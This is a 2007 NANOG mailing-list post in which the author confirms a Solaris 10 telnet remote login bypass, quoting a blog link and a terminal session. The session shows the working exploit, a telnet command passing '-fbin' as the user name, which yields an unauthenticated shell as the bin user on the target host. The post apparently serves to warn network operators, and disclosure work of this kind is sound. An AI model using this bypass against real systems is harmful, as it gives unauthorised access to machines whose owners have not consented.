Solaris 10 Telnet Exploit
William Schultz
wschultz at bsdboy.com
Mon Feb 12 03:30:27 UTC 2007
http://erratasec.blogspot.com/2007/02/trivial-remote-solaris-0day-
disable.html
Tested on Sol10, and it indeed works... Good thing we use SSH, right?!
################################
iWil:~ wschultz$ telnet -l "-fbin" dns1
Trying A.B.C.D...
Connected to dns1.my.com.
Escape character is '^]'.
Last login: Sun Feb 11 18:11:05 from A.B.C.D
Sun Microsystems Inc. SunOS 5.10 Generic January 2005
$ id
uid=2(bin) gid=2(bin)
$
################################
More information about the NANOG
mailing list